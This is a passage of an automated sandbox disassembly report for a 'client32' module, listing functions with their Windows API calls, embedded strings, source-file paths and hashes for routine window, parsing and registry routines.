std::_Xinvalid_argument.LIBCPMT ref: 110198DA

Strings

!"NOT IMPLEMENTED", xrefs: 110198EA
vector<T> too long, xrefs: 110198D5
..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp, xrefs: 110198E5

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: !"NOT IMPLEMENTED"$..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp$vector<T> too long
API String ID: 909987262-1355409292
Opcode ID: b59b3e48ade1ba9e86877e250c14f818b0443870f309251212fb243d2d557a09
Instruction ID: 45509ef83f4b777453d73ca0567eb7b8743cc9ae8aef4b1916a9b72e068dfb16
Opcode Fuzzy Hash: b59b3e48ade1ba9e86877e250c14f818b0443870f309251212fb243d2d557a09
Instruction Fuzzy Hash: EE419775F00206CBCB1CCE78C89066EB7E5EB84719B148A3EDC27DB688FA34E9058751

Function 110354B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 110354BF
EnumChildWindows.USER32(?,Function_00035030), ref: 110354FC

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Part of subcall function 11033760: IsWindow.USER32(?), ref: 11033768
Part of subcall function 11033760: GetWindowLongA.USER32(?,000000F0), ref: 1103377B

Strings

IsWindow(hDia), xrefs: 110354D3
CltAutoLogon.cpp, xrefs: 110354CE

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ChildEnumErrorExitLastLongMessageProcessWindowswsprintf
String ID: CltAutoLogon.cpp$IsWindow(hDia)
API String ID: 2743442841-2884807542
Opcode ID: 21a2b76fec222c1e6d0d260998ef43525eec84e1817e013d231b49b2bb670141
Instruction ID: 266056e39768e9626d6b00a12ef6d260c21a84dff935472d76ead0117b905fd9
Opcode Fuzzy Hash: 21a2b76fec222c1e6d0d260998ef43525eec84e1817e013d231b49b2bb670141
Instruction Fuzzy Hash: 3241CFB5E207059FC720DF24C991B9AB7F6BF8071AF50846DD84687AA0EB32F544CB91

Function 11039390 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 110393B2

Part of subcall function 1115F7E6: __getptd.LIBCMT ref: 1115F804

_strtok.LIBCMT ref: 11039433

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

CLTCONN.CPP, xrefs: 110393E7
; >, xrefs: 110393A9, 1103942C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
String ID: ; >$CLTCONN.CPP
API String ID: 3120919156-788487980
Opcode ID: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
Instruction ID: 48fd02c5cc66f23834ff9d805c81fd3cb0a4cfabe792bc6ab9c015f56f8a8e7f
Opcode Fuzzy Hash: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
Instruction Fuzzy Hash: 4821E775F1425B6BD701CEA58C40F9AB6D49F85359F0440A5FE08DB380FAB4AD0183D2

Function 11031170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(CF3D35D0,00000000,?,CF3D35D0,1118736B,000000FF,?,11066188,NSMWClass,CF3D35D0,?,1106DC18), ref: 110311AA
__strdup.LIBCMT ref: 110311F5

Part of subcall function 110310B0: LoadLibraryA.KERNEL32(Kernel32.dll,CF3D35D0,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
Part of subcall function 110310B0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
Part of subcall function 110310B0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
Part of subcall function 110310B0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154

Strings

NSMWClassVista, xrefs: 110311EF, 110311F4, 11031218
NSMWClass, xrefs: 110311BF

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
String ID: NSMWClass$NSMWClassVista
API String ID: 319803333-889775840
Opcode ID: 903a90e8a7d17424edb06c100f40dd41976d118595282118367260f60fabb7df
Instruction ID: da22cb9b74e46dcd904e816c1cfbcb9dca7c1c5d087ee23a6b3981c0c6242146
Opcode Fuzzy Hash: 903a90e8a7d17424edb06c100f40dd41976d118595282118367260f60fabb7df
Instruction Fuzzy Hash: 2721D272E286855FD701CF688C407EAFBFAAB8A625F4086A9EC55C7780E736D805C750

Function 110A95C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(80000000,SysListView32,11190240,?,?,?,?,00000000,80000000,?,00000000,00000000), ref: 110A9628

Strings

..\ctl32\listview.cpp, xrefs: 110A963A
SysListView32, xrefs: 110A9622
m_hWnd, xrefs: 110A963F

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: ..\ctl32\listview.cpp$SysListView32$m_hWnd
API String ID: 716092398-3171529584
Opcode ID: 637c1e481861933b660f9025ac84e75a0f093096606961fd602d82f68461a821
Instruction ID: 47062bfc9542a2c6c353129ffb0ec6f2ada6c6bd4fa77e90f028d1fc367f12b4
Opcode Fuzzy Hash: 637c1e481861933b660f9025ac84e75a0f093096606961fd602d82f68461a821
Instruction Fuzzy Hash: 74218E7960020AAFDB14DF59DC81FDBBBE9AF88314F10861DF95987281DB74E941CBA0

Function 11063300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11063340
_strtok.LIBCMT ref: 11063370
_strtok.LIBCMT ref: 11063388

Strings

,= , xrefs: 1106333A, 11063369, 11063381

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok
String ID: ,=
API String ID: 1675499619-2677018336
Opcode ID: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
Instruction ID: feda1c23a4deb0c6415e8fc3f525424d3758ff44d9e037eb8c71fca6166ea7b8
Opcode Fuzzy Hash: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
Instruction Fuzzy Hash: 7111C266E0866B1FEB41CE699C11BCBB7D85F06259F04C0D5F95C9B341EA20F801C6E2

Function 1114F010 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1114F04C
_memmove.LIBCMT ref: 1114F086

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

n > 128, xrefs: 1114F066
..\ctl32\WCUNPACK.C, xrefs: 1114F061

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$ErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\WCUNPACK.C$n > 128
API String ID: 6605023-1396654219
Opcode ID: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
Instruction ID: df32f2f24868e4b0a831f81203bc5965ced63257c83ed47365b8bb2cf1ea103c
Opcode Fuzzy Hash: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
Instruction Fuzzy Hash: 37112976C0116677C3118E2D9D88E8BFF69EB81A68F248125FC9817741F731A61087E2

Function 110EB400 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 110EB422

Part of subcall function 11160BD9: _xtoa@16.LIBCMT ref: 11160BF9

RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,00000000,nsdevcon64.exe,11190240,?,?,?,?,?,?,110FCFEA), ref: 110EB447

Strings

nsdevcon64.exe, xrefs: 110EB414
Error %d setting %s to %s, xrefs: 110EB459

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Value__itow_xtoa@16
String ID: Error %d setting %s to %s$nsdevcon64.exe
API String ID: 293635345-4188669160
Opcode ID: 8a4b82b92a86a1b278d0f43154331440ff368002b1b446561c3dd2f6a6996a9c
Instruction ID: cea032128ce82b3eaf0532e478ffcf8d701adba4055b92399446afe6a01fb2d0
Opcode Fuzzy Hash: 8a4b82b92a86a1b278d0f43154331440ff368002b1b446561c3dd2f6a6996a9c
Instruction Fuzzy Hash: 0401C075A01219AFD700CAA99C89FEAF7ECDB49708F108199F905E7240DA72AE0487A1

Function 11153530 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(00000000,00000000,00000000), ref: 11153583
UpdateWindow.USER32(?), ref: 111535AE

Strings

m_hWnd, xrefs: 1115356E, 1115359D
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11153569, 11153598

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InvalidateRectUpdateWindow
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1236202516-2830328467
Opcode ID: d7e7c2f0e3a6a5e44f8d0eeae6eb0b297d9b32f503593d364eb6036cc0b7aeaf
Instruction ID: b7b16df5a43d60f3fda019c1a35b497fb37b7041778627a412a7a8a3ae26887c
Opcode Fuzzy Hash: d7e7c2f0e3a6a5e44f8d0eeae6eb0b297d9b32f503593d364eb6036cc0b7aeaf
Instruction Fuzzy Hash: 6201A4B9B24716ABD2A5D761DC81F8AF364BF8572CF144828F1BB17580EA70F8808795

Function 11015020 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110A9E1D

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\ctl32\listview.cpp, xrefs: 110A9DFE
m_hWnd, xrefs: 11015033, 110A9E03
..\ctl32\liststat.cpp, xrefs: 1101502E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
API String ID: 819365019-2727927828
Opcode ID: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
Instruction ID: e80c3d609587989e24333d1fa603ed55b2b214ac37036ff82e40f0e660cda7c6
Opcode Fuzzy Hash: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
Instruction Fuzzy Hash: 6BF0F038B80325AFE321D681EC81FC5B2949B05B05F100828F2462B6D0EAA5B4C0C781

Function 110ED4D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetDeviceCaps.GDI32(?,0000000E), ref: 110ED4E2
GetDeviceCaps.GDI32(?,0000000C), ref: 110ED4E9

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

nColors, xrefs: 110ED505
..\CTL32\pcibmp.cpp, xrefs: 110ED500

Memory Dump Source

